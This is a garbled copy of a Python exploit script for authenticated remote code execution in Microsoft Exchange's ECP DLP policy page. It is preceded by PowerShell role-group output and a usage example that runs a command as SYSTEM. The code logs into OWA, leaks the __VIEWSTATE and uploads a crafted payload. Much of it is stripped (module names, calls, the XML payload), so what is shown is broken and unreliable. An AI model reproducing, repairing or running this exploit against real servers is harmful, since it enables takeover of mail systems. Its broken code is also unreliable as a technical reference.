Name AssignedRoles RoleAssignments ManagedBydlp users {Data Loss Prevention} {Data Loss Prevention-dlp users} {/Microsoft Exchange Security Groups/Organization Management, /Users/test}[PS] C:Windowssystem32>Get-RoleGroup "dlp users" | Format-ListRunspaceId : 098e1140-30e3-4144-8028-2174fdb43b85ManagedBy : {/Microsoft Exchange Security Groups/Organization Management, /Users/test}RoleAssignments : {Data Loss Prevention-dlp users}Roles : {Data Loss Prevention}DisplayName :ExternalDirectoryObjectId :Members : {/Users/Harry Mull}SamAccountName : dlp usersDescription :RoleGroupType : StandardLinkedGroup :Capabilities : {}LinkedPartnerGroupId :LinkedPartnerOrganizationId :Identity : /Microsoft Exchange Security Groups/dlp usersIsValid : TrueExchangeVersion : 0.10 (14.0.100.0)Name : dlp usersDistinguishedName : CN=dlp users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=comGuid : fa5c8458-8255-4ffd-b128-2a66bf9dbfd6ObjectCategory : /Configuration/Schema/GroupObjectClass : {top, group}WhenChanged : 6/12/2020 11:29:31 PMWhenCreated : 6/12/2020 11:29:31 PMWhenChangedUTC : 6/12/2020 3:29:31 PMWhenCreatedUTC : 6/12/2020 3:29:31 PMOrganizationId :Id : /Microsoft Exchange Security Groups/dlp usersOriginatingServer : ectState : ChangedExample:researcher@incite:~$ ./(+) usage: ./
(+) eg: ./ 192.168.75.142 harrym@:user123### mspaintresearcher@incite:~$ ./ 192.168.75.142 harrym@:user123### mspaint(+) logged in as harrym@(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5(+) executed mspaint as SYSTEM!"""import reimport sysimport randomimport stringimport urllib3import e_warnings(reRequestWarning)def random_string(str_len=8):letters = _lowercasereturn ''.join((letters) for i in range(str_len))def get_xml(c):return """4si""" % cdef trigger_rce(t, s, vs, cmd):f = {'__VIEWSTATE': (None, vs),'ctl00$ResultPanePlaceHolder$senderBtn': (None, "ResultPanePlaceHolder_ButtonsPanel_btnNext"),'ctl00$ResultPanePlaceHolder$contentContainer$name': (None, random_string()),'ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl': ("", get_xml(cmd)),}r = ("%s/ecp/DLPPolicy/" % t, files=f, verify=False)assert _code == 200, "(-) failed to trigger rce!"def leak_viewstate(t, s):r = ("%s/ecp/DLPPolicy/" % t, verify=False)match = ("", )assert match != None, "(-) couldn't leak the __viewstate!"return (1)def log_in(t, usr, pwd):s = n()d = {"destination": "%s/owa" % t,"flags": "","username": usr,"password": pwd}("%s/owa/" % t, data=d, verify=False)assert (name='X-OWA-CANARY') != None, "(-) couldn't leak the csrf canary!"return sdef main(t, usr, pwd, cmd):s = log_in(t, usr, pwd)print("(+) logged in as %s" % usr)vs = leak_viewstate(t, s)print("(+) found the __viewstate: %s" % vs)trigger_rce(t, s, vs, cmd)print("(+) executed %s as SYSTEM!" % cmd)if name == 'main':if len() != 4:print("(+) usage: %s " % [0])print("(+) eg: %s 192.168.75.142 harrym@:user123### mspaint" % [0])(-1)trgt = [1]assert ":" in [2], "(-) you need a user and password!"usr = [2].split("

